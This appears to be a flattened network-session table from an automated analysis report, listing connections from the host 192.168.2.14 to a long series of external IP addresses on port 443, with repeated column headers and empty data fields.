                                              21520192.168.2.1435544174.62.58.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21521192.168.2.1451634150.156.13.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21522192.168.2.1451910128.238.121.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21523192.168.2.144633670.168.51.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21524192.168.2.1443622169.115.198.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21525192.168.2.146063031.106.230.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21526192.168.2.144286254.87.26.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21527192.168.2.1458810141.130.231.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21528192.168.2.145066835.179.202.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21529192.168.2.1438634155.41.67.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21530192.168.2.144203031.58.197.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21531192.168.2.1438200203.197.180.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21532192.168.2.144570082.130.107.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21533192.168.2.1439586171.101.231.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21534192.168.2.143635073.123.44.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21535192.168.2.144737453.90.83.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21536192.168.2.1455010184.188.149.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21537192.168.2.1455982194.9.146.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21538192.168.2.1460334159.232.34.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21539192.168.2.1445820191.249.58.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21540192.168.2.14404424.180.35.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21541192.168.2.145650464.237.204.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21542192.168.2.1458258190.184.34.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21543192.168.2.1448460198.69.202.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21544192.168.2.1443412155.38.20.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21545192.168.2.143576281.115.112.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21546192.168.2.144719453.82.1.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21547192.168.2.145697886.111.7.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21548192.168.2.1454942105.223.10.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21549192.168.2.1451626102.214.24.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21550192.168.2.144568487.246.122.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21551192.168.2.1450668164.191.168.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21552192.168.2.1447906105.78.120.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21553192.168.2.1446732187.91.60.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21554192.168.2.1456374195.208.71.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21555192.168.2.1449912180.242.115.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21556192.168.2.1448408160.222.83.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21557192.168.2.1439298106.29.103.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21558192.168.2.145468849.87.66.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21559192.168.2.14333785.75.208.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21560192.168.2.1439654151.192.118.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21561192.168.2.144734094.110.63.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21562192.168.2.145052081.191.93.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21563192.168.2.1440042129.13.111.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21564192.168.2.1435774182.176.239.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21565192.168.2.1443028193.152.58.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21566192.168.2.144966452.32.151.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21567192.168.2.144755661.87.103.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21568192.168.2.1440604197.102.109.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21569192.168.2.1457988142.111.64.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21570192.168.2.1456426188.5.95.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21571192.168.2.144336080.44.201.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21572192.168.2.145863623.29.249.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21573192.168.2.143614439.255.124.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21574192.168.2.1437572142.206.231.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21575192.168.2.1435718218.23.66.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21576192.168.2.1443058144.199.14.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21577192.168.2.1433114165.88.168.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21578192.168.2.144763620.239.236.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21579192.168.2.145914847.89.216.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21580192.168.2.1451530212.155.151.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21581192.168.2.144027248.127.5.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21582192.168.2.1449272139.4.222.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21583192.168.2.1459072119.181.197.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21584192.168.2.1450016222.31.241.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21585192.168.2.1436052206.33.0.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21586192.168.2.145974871.227.163.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21587192.168.2.1452056134.45.185.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21588192.168.2.1448408192.116.49.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21589192.168.2.143688446.175.65.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21590192.168.2.143836485.205.44.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21591192.168.2.1446316141.217.80.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21592192.168.2.1460440102.156.60.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21593192.168.2.1434338108.169.82.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21594192.168.2.1446630165.221.18.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21595192.168.2.1452094116.75.117.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21596192.168.2.144254696.67.91.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21597192.168.2.1458764182.64.50.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21598192.168.2.1440450113.59.208.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21599192.168.2.14419968.204.22.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21600192.168.2.145396613.119.124.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21601192.168.2.1436270121.143.96.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21602192.168.2.145744677.87.40.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21603192.168.2.144617488.227.216.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21604192.168.2.1436678198.136.15.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21605192.168.2.144530058.239.59.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21606192.168.2.143902813.31.116.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21607192.168.2.1446114158.133.66.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21608192.168.2.145334641.244.178.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21609192.168.2.144646051.255.246.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21610192.168.2.1457832203.53.50.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21611192.168.2.143750865.146.71.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21612192.168.2.146095888.182.205.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21613192.168.2.145772053.8.97.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21614192.168.2.143919078.121.98.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21615192.168.2.145860613.37.196.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21616192.168.2.145443693.241.126.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21617192.168.2.1452344118.87.123.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21618192.168.2.143561484.80.70.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21619192.168.2.1435150152.27.189.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21620192.168.2.143767041.213.192.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21621192.168.2.145775043.87.108.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21622192.168.2.1445216176.120.238.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21623192.168.2.1445960186.187.170.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21624192.168.2.1451380216.2.36.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21625192.168.2.1433310182.169.13.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21626192.168.2.1448828151.232.114.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21627192.168.2.1452764222.7.33.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21628192.168.2.143809652.223.192.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21629192.168.2.1457496192.108.36.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21630192.168.2.144722019.137.225.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21631192.168.2.1454006200.28.144.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21632192.168.2.1436544142.227.121.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21633192.168.2.1438046148.9.177.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21634192.168.2.1449416154.32.11.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21635192.168.2.1447560129.112.115.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21636192.168.2.1458378107.205.231.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21637192.168.2.1447490188.9.100.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21638192.168.2.144906292.83.99.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21639192.168.2.144050096.245.241.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21640192.168.2.145585242.208.193.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21641192.168.2.1450780113.87.129.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21642192.168.2.1440402218.103.22.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21643192.168.2.1453786185.248.32.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21644192.168.2.1458110198.223.30.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21645192.168.2.1451022148.230.213.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21646192.168.2.1456960130.175.99.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21647192.168.2.144785093.75.119.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21648192.168.2.143647897.2.238.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21649192.168.2.143548869.32.232.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21650192.168.2.1449876106.34.250.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21651192.168.2.1454904126.222.171.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21652192.168.2.1445758142.63.94.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21653192.168.2.1433560140.220.159.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21654192.168.2.1433314216.193.63.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21655192.168.2.143934697.146.71.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21656192.168.2.145222665.6.213.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21657192.168.2.143608220.86.178.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21658192.168.2.1445560142.217.27.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21659192.168.2.1454270147.65.204.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21660192.168.2.14415282.240.22.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21661192.168.2.1442912213.217.4.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21662192.168.2.1453182189.51.115.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21663192.168.2.143937294.154.142.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21664192.168.2.1449104204.60.204.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21665192.168.2.14545302.6.223.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21666192.168.2.1433718204.117.127.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21667192.168.2.1457806128.105.34.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21668192.168.2.14558724.77.251.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21669192.168.2.1442532181.20.118.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21670192.168.2.144036484.179.248.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21671192.168.2.1439316126.45.199.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21672192.168.2.143901080.26.56.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21673192.168.2.145761862.162.161.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21674192.168.2.144827077.173.39.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21675192.168.2.145325823.147.242.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21676192.168.2.1432830120.201.119.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21677192.168.2.144908240.70.29.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21678192.168.2.143348020.178.246.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21679192.168.2.1451232156.157.186.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21680192.168.2.1434908119.203.37.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21681192.168.2.143606460.29.220.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21682192.168.2.1440488161.89.168.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21683192.168.2.1442134172.74.27.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21684192.168.2.1453516125.102.94.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21685192.168.2.1435868198.255.101.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21686192.168.2.145102882.113.196.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21687192.168.2.1438026177.243.157.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21688192.168.2.1443468148.124.220.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21689192.168.2.143701013.205.214.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21690192.168.2.1460156202.232.76.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21691192.168.2.145081848.120.165.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21692192.168.2.143634460.105.153.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21693192.168.2.1446442101.130.177.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21694192.168.2.1453684111.77.32.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21695192.168.2.1433780166.239.134.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21696192.168.2.144565819.109.87.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21697192.168.2.1447802221.23.79.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21698192.168.2.144215282.136.164.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21699192.168.2.144872095.122.180.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21700192.168.2.1433676133.195.28.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21701192.168.2.1436344126.136.176.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21702192.168.2.1455732209.39.131.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21703192.168.2.144984246.212.129.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21704192.168.2.1442404199.154.117.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21705192.168.2.145897291.21.9.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21706192.168.2.145290852.117.212.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21707192.168.2.1448606181.6.72.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21708192.168.2.143346612.254.200.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21709192.168.2.145539474.207.176.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21710192.168.2.1451050220.60.177.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21711192.168.2.1440518117.70.16.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21712192.168.2.1444274148.128.181.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21713192.168.2.1436626188.114.199.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21714192.168.2.144261852.185.246.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21715192.168.2.1441938165.183.36.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21716192.168.2.1449892208.243.251.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21717192.168.2.1447206116.164.209.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21718192.168.2.1440564184.51.200.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21719192.168.2.146007437.42.42.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21720192.168.2.1455052155.225.6.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21721192.168.2.1434080134.108.110.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21722192.168.2.1450194208.82.66.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21723192.168.2.145694898.205.228.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21724192.168.2.1457136180.104.87.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21725192.168.2.145066291.53.171.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21726192.168.2.1448584219.227.210.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21727192.168.2.1436362186.160.243.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21728192.168.2.14590524.16.164.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21729192.168.2.1447858135.55.26.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21730192.168.2.145107262.62.89.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21731192.168.2.144132462.50.72.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21732192.168.2.1439184147.91.128.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21733192.168.2.1449832209.177.85.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21734192.168.2.145272024.181.34.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21735192.168.2.145698477.95.74.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21736192.168.2.1437542149.239.162.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21737192.168.2.145040018.119.151.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21738192.168.2.1433284209.184.25.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21739192.168.2.1453674203.217.40.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21740192.168.2.145321895.72.184.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21741192.168.2.143847258.193.218.82443
                                              TimestampBytes transferredDirectionData


